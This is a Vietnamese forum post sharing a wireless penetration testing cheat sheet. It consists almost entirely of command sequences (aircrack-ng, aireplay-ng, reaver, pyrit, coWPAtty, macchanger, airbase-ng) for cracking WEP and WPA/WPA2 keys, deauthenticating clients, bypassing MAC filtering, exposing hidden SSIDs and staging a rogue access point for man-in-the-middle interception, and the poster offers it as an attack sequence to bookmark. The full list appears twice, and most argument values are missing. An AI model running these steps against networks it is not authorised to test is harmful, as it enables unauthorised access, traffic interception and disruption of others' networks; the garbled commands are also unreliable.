DDos
VIP Members
-
22/10/2013
-
525
-
2.189 bài viết
Wireless Penetration Testing Cheat Sheet
Lang thang trên Internet, tìm được bài viết hay hay lên quan tới các tấn công trên mạng không dây. Mình chia sẻ với các bạn. Bookmark lại nhé, sau này dùng thì mở nó ra là ok, vì nó bao gồm thứ tự cách để thực hiện tấn công trên mạng không dây.
Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
Increase Wi-Fi TX Power
root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig
Change WiFi Channel
root@uceka:~# iwconfig wlan0 channel
WEP CRACKING
Method 1 : Fake Authentication Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a -h -e wlan0mon
root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b -h wlan0mon
root@uceka:~# aircrack-ng –b
Method 2 : ARP Replay Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b -h wlan0mon
root@uceka:~# aircrack-ng –b
Method 3 : Chop Chop Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 –e -a -h wlan0mon
root@uceka:~# aireplay-ng -4 –b -h wlan0mon
#Press ‘y’ ;
root@uceka:~# packetforge-ng -0 –a -h -k -l -y -w
root@uceka:~# aireplay-ng -2 –r wlan0mon
root@uceka:~# aircrack-ng
Method 4 : Fragmentation Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 –e -a -h wlan0mon
root@uceka:~# aireplay-ng -5 –b -h < OurMac > wlan0mon
#Press ‘y’ ;
root@uceka:~# packetforge-ng -0 –a -h < OurMac > -k -l -y -w
root@uceka:~# aireplay-ng -2 –r wlan0mon
root@uceka:~# aircrack-ng
Method 5 : SKA (Shared Key Authentication) Type Cracking
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 10 –a -c wlan0mon
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# macchanger –-mac wlan0mon
root@uceka:~# ifconfig wlan0mon up
root@uceka:~# aireplay-ng -3 –b -h wlan0mon
root@uceka:~# aireplay-ng –-deauth 1 –a -h wlan0mon
root@uceka:~# aircrack-ng
WPA / WPA2 CRACKING
Method 1 : WPS Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# apt-get install reaver
root@uceka:~# wash –i wlan0mon –C
root@uceka:~# reaver –i wlan0mon –b -vv –S
#or, Specific attack
root@uceka:~# reaver –i –c -b -p -vv –S
Method 2 : Dictionary Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 1 –a -c wlan0mon
root@uceka:~# aircrack-ng –w -b
Method 3 : Crack with John The Ripper
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 1 –a -c wlan0mon
root@uceka:~# cd /pentest/passwords/john
root@uceka:~# ./john –wordlist= --rules –stdout|aircrack-ng -0 –e -w -
Method 4 : Crack with coWPAtty
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 1 –a -c wlan0mon
root@uceka:~# cowpatty –r -f -2 –s
root@uceka:~# genpmk –s –f -d
root@uceka:~# cowpatty –r -d -2 –s
Method 5 : Crack with Pyrit
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 1 –a -c wlan0mon
root@uceka:~# pyrit –r -b -i attack_passthrough
root@uceka:~# pyrit –i import_passwords
root@uceka:~# pyrit –e create_essid
root@uceka:~# pyrit batch
root@uceka:~# pyrit –r attack_db
Method 6 : Precomputed WPA Keys Database Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 1 –a -c wlan0mon
root@uceka:~# kwrite ESSID.txt
root@uceka:~# airolib-ng NEW_DB --import essid ESSID.txt
root@uceka:~# airolib-ng NEW_DB --import passwd
root@uceka:~# airolib-ng NEW_DB --clean all
root@uceka:~# airolib-ng NEW_DB --stats
root@uceka:~# airolib-ng NEW_DB --batch
root@uceka:~# airolib-ng NEW_DB --verify all
root@uceka:~# aircrack-ng –r NEW_DB
FIND HIDDEN SSID
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid wlan0mon
root@uceka:~# aireplay-ng -0 20 –a -c wlan0mon
BYPASS MAC FILTERING
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 10 –a -c wlan0mon
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# macchanger –-mac wlan0mon
root@uceka:~# ifconfig wlan0mon up
root@uceka:~# aireplay-ng -3 –b -h wlan0mon
MAN IN THE MIDDLE ATTACK
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airbase-ng –e “” wlan0mon
root@uceka:~# brctl addbr
root@uceka:~# brctl addif wlan0mon
root@uceka:~# brctl addif at0
root@uceka:~# ifconfig eth0 0.0.0.0 up
root@uceka:~# ifconfig at0 0.0.0.0 up
root@uceka:~# ifconfig up
root@uceka:~# aireplay-ng –deauth 0 –a wlan0mon
root@uceka:~# dhclient3 &
root@uceka:~# wireshark &
;select interface
Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
Increase Wi-Fi TX Power
root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig
Change WiFi Channel
root@uceka:~# iwconfig wlan0 channel
WEP CRACKING
Method 1 : Fake Authentication Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a -h -e wlan0mon
root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b -h wlan0mon
root@uceka:~# aircrack-ng –b
Method 2 : ARP Replay Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b -h wlan0mon
root@uceka:~# aircrack-ng –b
Method 3 : Chop Chop Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 –e -a -h wlan0mon
root@uceka:~# aireplay-ng -4 –b -h wlan0mon
#Press ‘y’ ;
root@uceka:~# packetforge-ng -0 –a -h -k -l -y -w
root@uceka:~# aireplay-ng -2 –r wlan0mon
root@uceka:~# aircrack-ng
Method 4 : Fragmentation Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 –e -a -h wlan0mon
root@uceka:~# aireplay-ng -5 –b -h < OurMac > wlan0mon
#Press ‘y’ ;
root@uceka:~# packetforge-ng -0 –a -h < OurMac > -k -l -y -w
root@uceka:~# aireplay-ng -2 –r wlan0mon
root@uceka:~# aircrack-ng
Method 5 : SKA (Shared Key Authentication) Type Cracking
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 10 –a -c wlan0mon
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# macchanger –-mac wlan0mon
root@uceka:~# ifconfig wlan0mon up
root@uceka:~# aireplay-ng -3 –b -h wlan0mon
root@uceka:~# aireplay-ng –-deauth 1 –a -h wlan0mon
root@uceka:~# aircrack-ng
WPA / WPA2 CRACKING
Method 1 : WPS Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# apt-get install reaver
root@uceka:~# wash –i wlan0mon –C
root@uceka:~# reaver –i wlan0mon –b -vv –S
#or, Specific attack
root@uceka:~# reaver –i –c -b -p -vv –S
Method 2 : Dictionary Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 1 –a -c wlan0mon
root@uceka:~# aircrack-ng –w -b
Method 3 : Crack with John The Ripper
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 1 –a -c wlan0mon
root@uceka:~# cd /pentest/passwords/john
root@uceka:~# ./john –wordlist= --rules –stdout|aircrack-ng -0 –e -w -
Method 4 : Crack with coWPAtty
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 1 –a -c wlan0mon
root@uceka:~# cowpatty –r -f -2 –s
root@uceka:~# genpmk –s –f -d
root@uceka:~# cowpatty –r -d -2 –s
Method 5 : Crack with Pyrit
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 1 –a -c wlan0mon
root@uceka:~# pyrit –r -b -i attack_passthrough
root@uceka:~# pyrit –i import_passwords
root@uceka:~# pyrit –e create_essid
root@uceka:~# pyrit batch
root@uceka:~# pyrit –r attack_db
Method 6 : Precomputed WPA Keys Database Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 1 –a -c wlan0mon
root@uceka:~# kwrite ESSID.txt
root@uceka:~# airolib-ng NEW_DB --import essid ESSID.txt
root@uceka:~# airolib-ng NEW_DB --import passwd
root@uceka:~# airolib-ng NEW_DB --clean all
root@uceka:~# airolib-ng NEW_DB --stats
root@uceka:~# airolib-ng NEW_DB --batch
root@uceka:~# airolib-ng NEW_DB --verify all
root@uceka:~# aircrack-ng –r NEW_DB
FIND HIDDEN SSID
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid wlan0mon
root@uceka:~# aireplay-ng -0 20 –a -c wlan0mon
BYPASS MAC FILTERING
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c --bssid -w wlan0mon
root@uceka:~# aireplay-ng -0 10 –a -c wlan0mon
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# macchanger –-mac wlan0mon
root@uceka:~# ifconfig wlan0mon up
root@uceka:~# aireplay-ng -3 –b -h wlan0mon
MAN IN THE MIDDLE ATTACK
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airbase-ng –e “” wlan0mon
root@uceka:~# brctl addbr
root@uceka:~# brctl addif wlan0mon
root@uceka:~# brctl addif at0
root@uceka:~# ifconfig eth0 0.0.0.0 up
root@uceka:~# ifconfig at0 0.0.0.0 up
root@uceka:~# ifconfig up
root@uceka:~# aireplay-ng –deauth 0 –a wlan0mon
root@uceka:~# dhclient3 &
root@uceka:~# wireshark &
;select interface
Chỉnh sửa lần cuối bởi người điều hành: